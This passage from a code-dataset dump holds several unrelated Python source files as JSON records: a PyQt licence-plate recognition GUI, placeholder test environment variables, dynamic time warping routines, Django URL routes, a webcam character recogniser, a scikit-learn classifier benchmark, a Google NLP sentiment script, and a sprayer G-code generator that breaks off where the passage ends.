self.lineEdit.text()\n if path != \"\":\n if self.radio_flag == 0:\n res_set = recognize_and_show_one_image(path,0)\n if len(res_set) > 0:\n filename = path.rsplit('/',1)[-1]\n self.tableWidget.setRowCount(len(res_set))\n for row in range(len(res_set)):\n self.tableWidget.setItem(row, 0, QTableWidgetItem(str(filename)))\n self.tableWidget.setItem(row, 1, QTableWidgetItem(res_set[row][2]))\n self.tableWidget.setItem(row, 2, QTableWidgetItem(res_set[row][1]))\n self.tableWidget.setItem(row, 3, QTableWidgetItem(str(res_set[row][3])))\n path = path.replace('/', '\\\\')\n # print(path)\n temp_dir = path.rsplit('\\\\', 1)[0] + '\\\\temp'\n self.path = temp_dir\n # print(self.path)\n pixmap = QPixmap(self.path+'\\\\'+'0.jpg')\n self.label_2.setPixmap(pixmap)\n else:\n QMessageBox.about(self,'提示','没有发现车牌!')\n else:\n\n files = os.listdir(path)\n filenames = [file for file in files if file.endswith('.jpg')\n or file.endswith('.png') or file.endswith('.jpeg')]\n res_list = []\n flag = 1\n path = path.replace('/', '\\\\')\n temp_dir = path + '\\\\' + 'temp'\n self.path = temp_dir\n for filename in filenames:\n file_dir = os.path.join(path, filename)\n\n # # create a new worker thread\n # thread1 = myThread(file_dir)\n # # start the thread\n # thread1.start()\n #\n # while not q.empty():\n # print(q.get())\n res_set = recognize_and_show_one_image(file_dir,flag)\n if len(res_set) > 0:\n flag +=1\n if len(res_set) > 1:\n for res in res_set:\n res_list.append(res)\n elif len(res_set) == 1:\n res_list.append(res_set[0])\n else:\n res_set.append(res_set)\n self.tableWidget.setRowCount(len(res_list))\n for row in range(len(res_list)):\n if len(res_list) > 0:\n self.tableWidget.setItem(row, 0, QTableWidgetItem(res_list[row][4]))\n self.tableWidget.setItem(row, 1, QTableWidgetItem(res_list[row][2]))\n self.tableWidget.setItem(row, 2, QTableWidgetItem(res_list[row][1]))\n self.tableWidget.setItem(row, 3, QTableWidgetItem(str(res_list[row][3])))\n\n QMessageBox.about(self,'Finished!','批处理完成!')\n pixmap = QPixmap(self.path + '\\\\' + '1.jpg')\n self.label_2.setPixmap(pixmap)\n else:\n QMessageBox.warning(self,'警告!','文件不能为空!')\n\n @pyqtSlot()\n def on_pushButton_3_clicked(self):\n if self.flag ==1:\n self.pic +=1\n path = self.path+'\\\\'+str(self.pic)+'.jpg'\n if os.path.exists(path):\n pixmap = QPixmap(path)\n self.label_2.setPixmap(pixmap)\n else:\n QMessageBox.warning(self,'Warning','这是最后一页了!')\n else:\n QMessageBox.warning(self,'Warning','请先识别!')\n\n @pyqtSlot()\n def on_pushButton_4_clicked(self):\n if self.flag ==1:\n self.pic -= 1\n path = self.path+'\\\\' + str(self.pic) + '.jpg'\n if self.pic!=0 and os.path.exists(path):\n pixmap = QPixmap(path)\n self.label_2.setPixmap(pixmap)\n else:\n QMessageBox.warning(self, 'Warning', '这是第一页了!')\n else:\n QMessageBox.warning(self,'Warning','请先识别!')\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n\n def __init__(self, parent=None):\n\n super(MainWindow, self).__init__(parent)\n self.setupUi(self)\n \n @pyqtSlot()\n def on_pushButton_2_clicked(self):\n\n ui_image = Image()\n ui_image.showMaximized()\n ui_image.exec_()\n \n @pyqtSlot()\n def on_pushButton_3_clicked(self):\n\n print(u'视频处理!')\n ui_video = VideoWindow()\n ui_video.exec_()\n \n @pyqtSlot()\n def on_pushButton_clicked(self):\n\n print(u'摄像头处理!')\n \nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n splash = QSplashScreen(QPixmap(\":/my_pics/slide3.jpg\"))\n splash.showMessage(u\"加载... 
0%\", QtCore.Qt.AlignHCenter | QtCore.Qt.AlignBottom, QtCore.Qt.black)\n splash.show()\n QtWidgets.qApp.processEvents()\n ui = MainWindow()\n ui.show()\n splash.finish(ui)\n sys.exit(app.exec_())\n","repo_name":"xingzhoupy/Plate_LPR","sub_path":"MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":7867,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"39719938261","text":"import os\n\n\nclass TestHelpers:\n ENV_VARS = {\n 'POSTGRES_HOST': 'test_psql_host',\n 'POSTGRES_PORT': 'test_psql_port',\n 'POSTGRES_USER': 'test_psql_user',\n 'POSTGRES_PSWD': 'test_psql_pswd',\n 'POSTGRES_NAME': 'test_psql_name',\n 'POSTGRES_ADMIN_USER': 'test_psql_admin',\n 'POSTGRES_ADMIN_PSWD': 'test_psql_admin_pswd',\n 'REDIS_HOST': 'test_redis_host',\n 'REDIS_PORT': 'test_redis_port',\n 'ELASTICSEARCH_INDEX': 'test_es_index',\n 'ELASTICSEARCH_HOST': 'test_es_host',\n 'ELASTICSEARCH_PORT': 'test_es_port',\n 'ELASTICSEARCH_TIMEOUT': 'test_es_timeout',\n 'RABBIT_HOST': 'test_rbmq_host',\n 'RABBIT_PORT': 'test_rbmq_port',\n 'RABBIT_VIRTUAL_HOST': 'test_rbmq_vhost',\n 'RABBIT_EXCHANGE': 'test_exchange',\n 'RABBIT_USER': 'test_rbmq_user',\n 'RABBIT_PSWD': 'test_rbmq_pswd',\n 'OCLC_ROUTING_KEY': 'test_oclc_key',\n 'OCLC_QUEUE': 'test_oclc_queue',\n 'FILE_ROUTING_KEY': 'test_file_key',\n 'FILE_QUEUE': 'test_file_queue',\n 'HATHI_DATAFILES': 'test_hathi_url',\n 'OCLC_API_KEY': 'test_oclc_key',\n 'OCLC_CLASSIFY_API_KEY': 'test_classify_key',\n 'AWS_ACCESS': 'test_aws_key',\n 'AWS_SECRET': 'test_aws_secret',\n 'AWS_REGION': 'test_aws_region',\n 'FILE_BUCKET': 'test_aws_bucket',\n 'NYPL_BIB_HOST': 'test_bib_host',\n 'NYPL_BIB_PORT': 'test_bib_port',\n 'NYPL_BIB_NAME': 'test_bib_name',\n 'NYPL_BIB_USER': 'test_bib_user',\n 'NYPL_BIB_PSWD': 'test_bib_pswd',\n 'NYPL_LOCATIONS_BY_CODE': 'test_location_url',\n 'NYPL_API_CLIENT_ID': 'test_api_client',\n 'NYPL_API_CLIENT_SECRET': 'test_api_secret',\n 'NYPL_API_CLIENT_TOKEN_URL': 'test_api_token_url',\n 'GITHUB_API_KEY': 'test_github_key',\n 'GITHUB_API_ROOT': 'test_github_url',\n 'BARDO_CCE_API': 'test_cce_url',\n 'MUSE_MARC_URL': 'test_muse_url',\n 'MUSE_CSV_URL': 'test_muse_csv',\n 'DOAB_OAI_URL': 'test_doab_url',\n 'SMARTSHEET_API_TOKEN': 'test_smartsheet_token',\n 'SMARTSHEET_SHEET_ID': '1000',\n 'WEBPUB_CONVERSION_URL': 'test_conversion_url',\n 'WEBPUB_PDF_PROFILE': 'test_profile_uri'\n }\n\n @classmethod\n def setEnvVars(cls):\n for key, value in cls.ENV_VARS.items():\n os.environ[key] = value\n\n @classmethod\n def clearEnvVars(cls):\n for key in cls.ENV_VARS.keys():\n os.environ[key] = ''\n","repo_name":"NYPL/drb-etl-pipeline","sub_path":"tests/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"hi","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"13273526055","text":"from point2d import Point2D\nimport math\n\ndef distance(a1, a2):\n \"\"\" Finds the normal unmodified version of the dynamic time warping algorithm\n between two time series arrays \"\"\"\n n = len(a1)\n m = len(a2)\n\n # Create a nxm sized matrix where all values are initialized to infinity\n DTW = [ [float(\"inf\")] * m for i in range(n) ]\n DTW[0][0] = 0\n\n for i in range(n):\n for j in range(m):\n cost = __dist__(a1[i], a2[j])\n prev_i = i-1 if i>0 else 0 # If on the edges of the matrix do not\n prev_j = j-1 if j>0 else 0 # use negative indices\n min_previous = min( DTW[prev_i][ j],\n DTW[ i][ prev_j],\n DTW[prev_i][ prev_j])\n DTW[i][j] 
= cost + min_previous\n return DTW[n-1][m-1]\n\ndef time_percentage(a1, time1, a2, time2):\n \"\"\" Finds the modified version of the dynamic time warping algorithm\n between two time series arrays and their given times. The two paths do not\n need to be of the same length or have the same timing signatures however this\n function has an O(nm) time complexity.\"\"\"\n n = len(a1)\n m = len(a2)\n\n # Create a nxm sized matrix where all values are initialized to infinity\n DTW = [ [float(\"inf\")] * m for i in range(n) ]\n DTW[0][0] = 0\n\n # Max distance is the largest penalty the combined cost can have\n MAX_DISTANCE = 5 # this value could be substituted with beta radius\n # Max aggregate distance is the worst possible combined cost\n MAX_AGGREGATE_DISTANCE = MAX_DISTANCE * n\n\n for i in range(n):\n for j in range(m):\n dist_cost = __dist__(a1[i], a2[j])\n time_cost = __time_cost__( max(time1[i], time2[j]) )\n total_cost = dist_cost + time_cost\n total_cost = MAX_DISTANCE if total_cost > MAX_DISTANCE else total_cost\n\n prev_i = i-1 if i>0 else 0 # If on the edges of the matrix do not\n prev_j = j-1 if j>0 else 0 # use negative indices\n min_previous = min( DTW[prev_i][ j],\n DTW[ i][ prev_j],\n DTW[prev_i][ prev_j])\n\n DTW[i][j] = total_cost + min_previous\n return 1 - (DTW[n-1][m-1]/MAX_AGGREGATE_DISTANCE ) # Return a percentage of simularity\n\ndef basic_function(a1, a2, time):\n \"\"\" This basic function is not a DTW function but performs a basic comparison\n of two identically sized time series paths. An interpolation technique could\n be used to get the exact same number of samples at the same time if this method\n is used. Complexity is O(n) \"\"\"\n n = len(time)\n MAX_DISTANCE = 5 # this value could be substituted with beta radius\n MAX_AGGREGATE_DISTANCE = MAX_DISTANCE * n\n aggregate_cost = 0\n for i in range(n):\n dist_cost = __dist__(a1[i], a2[i])\n time_cost = __time_cost__(time[i])\n total_cost = dist_cost + time_cost\n aggregate_cost += MAX_DISTANCE if total_cost > MAX_DISTANCE else total_cost\n return 1 - (aggregate_cost / MAX_AGGREGATE_DISTANCE)\n\ndef __dist__(point1, point2):\n \"\"\" Distance function currently being used for the distance calculations \"\"\"\n # Use the Point2D to find the abs(point1-point2)\n return (point1 - point2).r\n\ndef __time_cost__( time ):\n \"\"\" Time cost function currently being used for distance calculations \"\"\"\n time_cost = math.log(time/10)+1 # A suitable function should be found\n return time_cost if time_cost > 0 else 0\n\nif __name__ == \"__main__\":\n print(\"Quick test in progress\")\n a1 = [Point2D(0,0), Point2D(0,1), Point2D(0,2), Point2D(0,3)]\n a2 = [Point2D(1,0), Point2D(2,0), Point2D(3,0), Point2D(4,0)]\n print(distance(a1, a2))\n print(distance(a1, a1))\n","repo_name":"heterdaft/Dynamic-Time-Warping-with-Modifications","sub_path":"dtw.py","file_name":"dtw.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36650503155","text":"from django.urls import path\nfrom rest_framework.authtoken.views import obtain_auth_token\n\nfrom . 
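# distance() above materializes the full n-by-m DTW matrix even though each
# cell only reads the previous and current rows, so memory can drop from
# O(nm) to O(m) with a rolling two-row buffer. A sketch for scalar series
# (plain abs() stands in for the Point2D-based __dist__):
def dtw_two_rows(a1, a2):
    n, m = len(a1), len(a2)
    prev = [float("inf")] * m
    prev[0] = abs(a1[0] - a2[0])
    for j in range(1, m):                  # cumulative first row
        prev[j] = prev[j - 1] + abs(a1[0] - a2[j])
    for i in range(1, n):
        curr = [float("inf")] * m
        curr[0] = prev[0] + abs(a1[i] - a2[0])
        for j in range(1, m):
            cost = abs(a1[i] - a2[j])
            curr[j] = cost + min(prev[j], curr[j - 1], prev[j - 1])
        prev = curr
    return prev[m - 1]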
import views\n\nurlpatterns = [\n path('', views.home_view, name='home_view'),\n path('api-token-auth', obtain_auth_token, name='api_token_auth'),\n path('create', views.create_broad_topic, name='create_broad_topic'),\n path('delete', views.delete_broad_topic, name='delete_broad_topic'),\n path('create-subtopic', views.create_subtopic, name='create-subtopic'),\n path('create-item', views.create_item, name='create-item'),\n path('delete-subtopic', views.delete_subtopic, name='delete-subtopic'),\n path('delete-item', views.delete_item, name='delete-item'),\n path('update-item', views.update_item, name='update-item'),\n path('update-subtopic', views.update_subtopic, name='update-subtopic'),\n path('update-topic', views.update_broad_topic, name='update-broad-topic'),\n path('update-item-priorities', views.update_item_priorities, name='update-item-priorities'),\n path('login', views.login_user, name='login'),\n path('register', views.register, name='register'),\n path('logout', views.logout_view, name='logout')\n]","repo_name":"skbhagat40/To-Do-List-FulllStack-Django","sub_path":"trello_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23950628325","text":"# coding:utf-8\nimport cv2\nimport keras\nimport numpy as np\nimport collections\nfrom PIL import ImageFont, ImageDraw, Image\nfrom keras.models import model_from_json#load_model\nfrom keras.preprocessing.image import array_to_img, img_to_array,load_img\nimport os\nimport re\n\nlabel_dict = {\"0\":\"あ\", \"1\":\"い\", \"2\":\"う\", \"3\":\"え\", \"4\":\"お\", \"5\":\"か\", \"6\":\"き\", \"7\":\"く\", \"8\":\"け\", \"9\":\"こ\", \"10\":\"さ\", \"11\":\"し\", \"12\":\"す\", \"13\":\"せ\", \"14\":\"そ\", \"15\":\"た\", \"16\":\"ち\", \"17\":\"つ\", \"18\":\"て\", \"19\":\"と\", \"20\":\"な\", \"21\":\"に\", \"22\":\"ぬ\", \"23\":\"ね\", \"24\":\"の\", \"25\":\"は\", \"26\":\"ひ\", \"27\":\"ふ\", \"28\":\"へ\", \"29\":\"ほ\", \"30\":\"ま\", \"31\":\"み\", \"32\":\"む\", \"33\":\"め\", \"34\":\"も\", \"35\":\"や\", \"36\":\"ゆ\", \"37\":\"よ\", \"38\":\"ら\", \"39\":\"り\", \"40\":\"る\", \"41\":\"れ\", \"42\":\"ろ\", \"43\":\"わ\", \"44\":\"ゐ\", \"45\":\"ゑ\", \"46\":\"を\", \"47\":\"ん\", \"48\":\"ゝ\", \"49\":\"-\"}\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\"\n\nmodel =model_from_json(open(\"model/k_mnist_cnn_model.json\").read())\nmodel.load_weights(\"model/k_mnist_cnn_weights.h5\")\n\ndef remake(frame):\n threshold = 100\n ret, frame= cv2.threshold(frame, threshold, 255, cv2.THRESH_BINARY)\n frame=cv2.bitwise_not(frame)\n img=cv2.resize(frame[150:350,200:400],(28,28))\n return img\n\ndef check_number(frame):\n X = []\n img = img_to_array(frame)\n X.append(img)\n X = np.asarray(X)\n X = X.astype(\"float32\")\n X = X / 255.0\n num=model.predict(X)\n ans=str(num.argmax())\n return ans\n\ndef img_add_msg(img, message):\n font_path = 'C:\\Windows\\Fonts\\meiryo.ttc' # Windowsのフォントファイルへのパス\n font_size = 24 # フォントサイズ\n font = ImageFont.truetype(font_path, font_size) # PILでフォントを定義\n img = Image.fromarray(img) # cv2(NumPy)型の画像をPIL型に変換\n draw = ImageDraw.Draw(img) # 描画用のDraw関数を用意\n # テキストを描画(位置、文章、フォント、文字色(BGR+α)を指定)\n draw.text((20, 50), message, font=font, fill=(255, 0, 0, 0))\n img = np.array(img) # PIL型の画像をcv2(NumPy)型に変換\n return img\n\ndef main():\n cap = cv2.VideoCapture(0)\n ans = []\n text = \"49\"\n while(cap.isOpened()):\n ret,frame=cap.read()\n frame1=frame\n frame = cv2.cvtColor(cap.read()[1], cv2.COLOR_RGB2GRAY)\n img=remake(frame)\n 
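# The api-token-auth route above is DRF's obtain_auth_token view: it takes a
# POST with username/password and answers {"token": "..."}. A hedged client
# sketch with requests -- the host, the demo credentials, and the payload for
# the create route are illustrative assumptions:
import requests

resp = requests.post("http://localhost:8000/api-token-auth",
                     data={"username": "demo", "password": "demo-pass"})
token = resp.json()["token"]
requests.post("http://localhost:8000/create",
              headers={"Authorization": f"Token {token}"},  # DRF token scheme
              data={"name": "groceries"})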
ansnum=check_number(img)\n ans.append(ansnum)\n if (len(ans)>10):\n c = collections.Counter(ans)\n text = c.most_common()[0][0]\n ans.clear()\n tex=label_dict[text]\n\n frame1 = img_add_msg(frame1, tex)\n cv2.imshow(\"num\", frame1)\n\n key = cv2.waitKey(10)\n if key == 27:\n #escキー\n cv2.destroyAllWindows()\n break\n cap.release()\n cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"andoureo/deeplernning","sub_path":"kmnist.py","file_name":"kmnist.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71543147309","text":"import first_approach as fa\nimport second_approach as sa\n\n\nfrom sklearn.linear_model import RidgeClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.naive_bayes import BernoulliNB, ComplementNB, MultinomialNB, GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neighbors import NearestCentroid\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.utils.extmath import density\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn import metrics\n\n\nfrom time import time\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n## Return the evental classifying differences between \n## two result arrays\n\ndef compare_lists(l1,l2):\n l = []\n for i in range(len(l1)):\n if(l1[i] != l2[i]):\n l.append((i,l1[i],l2[i]))\n return l\n\n\n## Measures the performances of a certain approach with the selected model\n\ndef benchmark(clf,Approach=1,vect_type=\"hash\"):\n print('_' * 80)\n print(\"Training: \")\n print(clf)\n clf_trained = None\n score = 0\n t0 = time()\n if Approach == 1:\n clf_trained,score,vectorizer = fa.train_and_test_model(clf,vect_type=\"hash\")\n elif Approach == 2:\n clf_trained,score = sa.train_and_test_model(clf)\n else:\n raise RuntimeError(\"Only two approaches known : Bucket of Words[1] or Manual Graph Analysis[2]\")\n train_time = time() - t0\n print(\"train and test time: %0.3fs\" % train_time)\n\n t0 = time()\n if Approach == 1:\n fa.evaluate_mystery_set(clf_trained,vect=vectorizer)\n elif Approach == 2:\n sa.evaluate_mystery_set(clf_trained)\n \n test_time = time() - t0\n print(\"test with mystery dataset time: %0.3fs\" % test_time)\n\n print(\"accuracy: %0.3f\" % score)\n print()\n clf_descr = str(clf).split('(')[0]\n return clf_descr, score, train_time, test_time\n\n\n## Generates the output on a .txt file of the test on blind-dataset by using\n## two approaches with the selected models\n\ndef output_to_file(clf1=None,v_type=\"hash\",clf2=None,output=True,diff=True):\n \n print()\n print(\"##################################\")\n print(\"######## First Approach ########\")\n print(\"##################################\")\n print()\n\n if clf1 is None:\n clf_trained1,_,vect = fa.train_and_test_model(vect_type=v_type,verbose=True)\n else:\n clf_trained1,_,vect = fa.train_and_test_model(clf1,vect_type=v_type,verbose=True)\n print()\n print(\"##################################\")\n print(\"######## Second Approach ########\")\n print(\"##################################\")\n print()\n\n if clf2 is None:\n clf_trained2,_ = sa.train_and_test_model(verbose=True)\n else:\n clf_trained2,_ = sa.train_and_test_model(clf2,verbose=True)\n y1=fa.evaluate_mystery_set(clf_trained1,vect=vect)\n 
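# main() in kmnist.py above buffers roughly 10 predictions and keeps the most
# common one via collections.Counter, updating the label only when the buffer
# fills. A rolling variant that re-votes on every frame, sketched with a deque:
from collections import Counter, deque

window = deque(maxlen=10)

def smooth_label(new_label):
    # majority label over the last 10 per-frame predictions
    window.append(new_label)
    return Counter(window).most_common(1)[0][0]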
y2=sa.evaluate_mystery_set(clf_trained2)\n if diff:\n assert len(y1) == len(y2)\n diff = compare_lists(y1,y2)\n print(\"Over \"+str(len(y1))+\" occurrences:\")\n print(\"Number of Differences \" + str(len(diff)))\n perc = (len(diff)/len(y1)) * 100\n print(\"Percentage of Differences %0.3f%%\" % perc )\n if output:\n title1 = \"results1_\"+v_type+\".txt\"\n f = open(title1, \"w\")\n for element in y1:\n f.write(element+'\\n')\n f.close()\n f = open(\"results2.txt\", \"w\")\n for element in y2:\n f.write(element+'\\n')\n f.close()\n\n## Measures the performances of a certain approach with different models\n\ndef test_approach(Appr=1,vect_t=\"none\"):\n results = []\n for clf, name in (\n (RidgeClassifier(tol=1e-2, solver=\"auto\"), \"Ridge Classifier\"),\n (PassiveAggressiveClassifier(max_iter=50),\n \"Passive-Aggressive\"),\n (KNeighborsClassifier(n_neighbors=10), \"kNN\"),\n (RandomForestClassifier(), \"Random forest\"),\n (LinearSVC(),\"Linear SVC\"),\n (DecisionTreeClassifier(),\"Desition Tree\"),\n (MultinomialNB(alpha=.01),\"MultinomialNB\"),\n (BernoulliNB(alpha=.01),\"BernoulliNB\"),\n (ComplementNB(alpha=.1),\"ComplementNB\")\n ):\n # Naive Byes won't work with negative values\n if name in [\"BernoulliNB\",\"MultinomialNB\",\"ComplementNB\"] and vect_t in [\"hash\",\"tfid\",\"count\"]:\n continue\n print('=' * 80)\n print(name)\n print()\n print(\"Approach: \"+str(Appr)+\", Vectorizer Transform: \"+vect_t)\n results.append(benchmark(clf,Approach=Appr,vect_type=vect_t))\n print('=' * 80)\n indices = np.arange(len(results))\n return results,indices\n\n## Plot the results of the benchmark\n\ndef plot_results(results,indices,title=None):\n results = [[x[i] for x in results] for i in range(4)]\n\n clf_names, score, training_time, test_time = results\n training_time = np.array(training_time) / np.max(training_time)\n test_time = np.array(test_time) / np.max(test_time)\n\n plt.figure(figsize=(12, 8))\n if title is None:\n plt.title(\"Score\")\n else:\n plt.title(title)\n plt.barh(indices, score, .2, label=\"score\", color='navy')\n plt.barh(indices + .3, training_time, .2, label=\"training time\",\n color='c')\n plt.barh(indices + .6, test_time, .2, label=\"test time\", color='darkorange')\n plt.yticks(())\n plt.legend(loc='best')\n plt.subplots_adjust(left=.25)\n plt.subplots_adjust(top=.95)\n plt.subplots_adjust(bottom=.05)\n\n for i, c in zip(indices, clf_names):\n plt.text(-.3, i, c)\n plt.show()\ndef best_in_results(results):\n max_ = 0\n clf = \"\"\n for clf_descr,accuracy, _, _ in results:\n if accuracy > max_:\n max_ = accuracy\n clf = clf_descr\n return max_,clf \n\n#output_to_file(clf1=PassiveAggressiveClassifier(),v_type=\"tfid\",clf2=RandomForestClassifier())\n\n\nresults1h,indices1h=test_approach(Appr=1,vect_t=\"hash\")\nmax_1h,clf1h=best_in_results(results1h)\n\nresults1c,indices1c=test_approach(Appr=1,vect_t=\"count\")\nmax_1c,clf1c=best_in_results(results1c)\n\nresults1r,indices1r=test_approach(Appr=1,vect_t=\"tfid\")\nmax_1r,clf1r=best_in_results(results1r)\n\n\nresults2,indices2=test_approach(Appr=2,vect_t=\"none\")\nmax_2,clf2=best_in_results(results2)\n\nprint(\"Best in categories:\")\nprint()\nprint(max_1h,clf1h)\nprint(max_1c,clf1c)\nprint(max_1r,clf1r)\n\nprint(max_2,clf2)\n\nplot_results(results1h,indices1h,title=\"1st Approach with Hash Vectorizer\")\nplot_results(results1c,indices1c,title=\"1st Approach with Count Vectorizer\")\nplot_results(results1r,indices1r,title=\"1st Approach with Tfid Vectorizer\")\n\nplot_results(results2,indices2,title=\"2nd 
Approach\")\n#Best in categories:\n#0.9846762234305487 PassiveAggressiveClassifier\n#0.9817103311913 PassiveAggressiveClassifier\n#0.9831932773109243 PassiveAggressiveClassifier\n#0.9688581314878892 RandomForestClassifier\n","repo_name":"IlKaiser/ML-H1","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11882895752","text":"from google.cloud import language_v1\nfrom google.cloud.language_v1 import enums\nfrom google.cloud import translate_v3beta1 as translate\nfrom nlp import nlp\n\ndef test_language_sentiment(input_file, client):\n with open('lang_sent.txt', 'w') as output_file:\n for line in input_file:\n line = line.strip(\"RT\").strip()\n review = nlp(line)\n review.analyze_sentiment(client) \n output = review.language + ',' + str(review.sentiment) + '\\n'\n print(output)\n output_file.write(output)\n\ndef test_entity_sent(input_file, client):\n with open('entities.csv', 'w') as output_file:\n for line in input_file:\n line = line.strip(\"RT\").strip()\n review = nlp(line)\n review.analyze_sentiment(client)\n # do entity analysis if only in 'en' \n if ((review.language) and (review.language == \"en\")):\n print(review)\n print(review.language)\n review.analyze_entity_sentiment(client)\n for entity in review.entities:\n output = entity.name + '\\n'\n print(output)\n output_file.write(output)\n print(review)\n\n\n# nlp client\nnlp_client = language_v1.LanguageServiceClient()\n\ninput_file = open('sample_reviews.csv', 'r')\ntest_entity_sent(input_file, nlp_client)\ninput_file.close()\n","repo_name":"roshan2M/jet-blue-analysis","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22857027655","text":"spray_distance = float(\"5\")\nspray_hight = 60\nspray_speed = 180\nspray_flow = 0.2\nspray_cycles = 2\nspray_delay = 1\nspray_solution = 4\n\n\nfilename = \"C:/Users/stoecma2/Desktop/test.gcode\"\n\t\nfile = open(filename, \"w\")\nfile.write( \";Spray file generated on the fly\\n\")\n\nif 1:\n\t###################section start###################\n\t# position constants\n\tsp_home_x = 0.0\n\tsp_home_y = 0.0\n\tsp_home_z = 0.0\n\tsp_offset = 0.0\n\tsp_x1 = -60.0\n\tsp_x2 = 60.0\n\tsp_y1 = -80.0\n\tsp_y2 = 80.0\n\tsp_top = 100.0\n\tsp_wash_x = 0.0\n\tsp_wash_y = -110.0\n\tsp_wash_z = -50.0\n\t# wash position top, use to approach\n\tsp_wash_u = -30.0\n\n\t# commands\n\tsc_valve_wash = \"G1 V2 F200\\nG4 S1\\n\"\n\tsc_valve_spray = \"G1 V1 F200\\nG4 S1\\n\"\n\tsc_valve_waste = \"G1 V0 F200\\nG4 S1\\n\"\n\t#go to valve position % nr\n\tsc_valve_pos = \"G1 V{} F200\\nG4 S1\\n\"\n\tsc_air_on = \"M106\\n\"\n\tsc_air_off = \"M106 S0\\n\"\n\tsc_init = \"G28XYZ\\nG28P\\n\"\n\tsc_motor_off = \"M18\\n\"\n\n\t# go to wash position\n\tsc_go_to_wash = \";go to wash\\nG1 X{} Y{} Z{} F200\\nG1 Z{}\\n\".format (sp_wash_x, sp_wash_y, sp_wash_u, sp_wash_z)\n\n\t# aspirate % position\n\tsc_aspirate = \"G1 P{} F200\\n\"\n\n\t# set syringe to absolute mode\n\tsc_syringe_absolute= \"M82\\n\"\n\n\t# set syringe to realtive mode\n\tsc_syringe_relative = \"M83\\n\"\n\n\t# empty syringe\n\tsc_empty = \"G1 P0 F200\\n\"\n\n\t# wait % seconds\n\tsc_wait = \"G4 S{}\\n\"\n\n\t# set speed % speed\n\tsc_speed = \"G1 F{}\\n\"\n\n\t# go to syringe position % position\n\tsc_syringe_position = \"G1 P{}\\n\"\n\n\t# move fast % x, y position\n\tsc_move_fast 
= \"G1 X{} Y{} F200\\n\"\n\n\t# move fast % z position\n\tsc_move_fast_z = \"G1 Z{} F200\\n\"\n\n\t# spray fast % x, y, p, f\n\tsc_spray = \"G1 X{} Y{} P{} F{}\\n\"\n\n\tsc_go_home = \"G1 X0 Y0 Z0 F200\\n\"\n\n\t# washing tip\n\t# a go to wash position\n\tsc_wash = \"; wash\\n\"\n\tsc_wash += sc_syringe_absolute\n\tsc_wash += sc_go_to_wash\n\t# spray rest to waste\n\tsc_wash += sc_air_on\n\tsc_wash += sc_valve_waste + sc_empty\n\t# clean syringe with wash solution\n\tsc_wash += sc_valve_wash + sc_aspirate.format(10)\n\tsc_wash += sc_valve_waste + sc_empty\n\t# clean spray with wash solution\n\tsc_wash += sc_valve_wash + sc_aspirate.format(4)\n\tsc_wash += sc_valve_spray + sc_speed.format(0.5) + sc_syringe_position.format(0)\n\t# drip wash solution from spray\n\tsc_wash += sc_air_off\n\tsc_wash += sc_valve_wash + sc_aspirate.format(3)\n\tsc_wash += sc_valve_spray + sc_speed.format(0.2) + sc_syringe_position.format(0)\n\tsc_wash += sc_syringe_position.format(1)\n\tsc_wash += sc_air_on\n\tsc_wash += sc_syringe_position.format(0)\n\n\t# priming system\n\tsc_prime =\"; prime\\n\" + sc_init\n\tsc_prime += sc_syringe_absolute\n\tsc_prime += sc_valve_wash + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\tsc_prime += sc_valve_pos.format(3) + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\tsc_prime += sc_valve_pos.format(4) + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\tsc_prime += sc_valve_pos.format(5) + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\tsc_prime += sc_valve_wash + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\n\t# purge system\n\tsc_purge =\"; purge\\n\" + sc_init\n\tsc_purge += sc_syringe_absolute\n\tsc_purge += sc_valve_wash + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\tsc_purge += sc_valve_wash + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\tsc_purge += sc_valve_wash + sc_aspirate.format(10) + sc_valve_waste + sc_empty\n\n\n\t# dry spray\n\tsc_wash += sc_air_on + \"G4 S2\\nG4 S2\\nG4 S2\\nG4 S2\\n\" + sc_air_off\n\n\t#coating starts\n\tfile.write(\";start coating\\n\")\n\tfile.write(sc_init)\n\n\t#syringe parameter in ul/mm\n\tspray_syringe_volume_per_travel = 29\n\t\n\t#flow contains ul/cm^2\n\t#densitity in ul/mm\n\tspray_density = float(spray_flow)/100 * spray_distance\n\n\tspray_lines = int((sp_y2 - sp_y1)/spray_distance)\n\tspray_travel_distance = spray_lines * (sp_x2 - sp_x1) + (sp_y2 - sp_y1)\n\tspray_time = spray_travel_distance / spray_speed\n\n\tspray_syringe_volume = 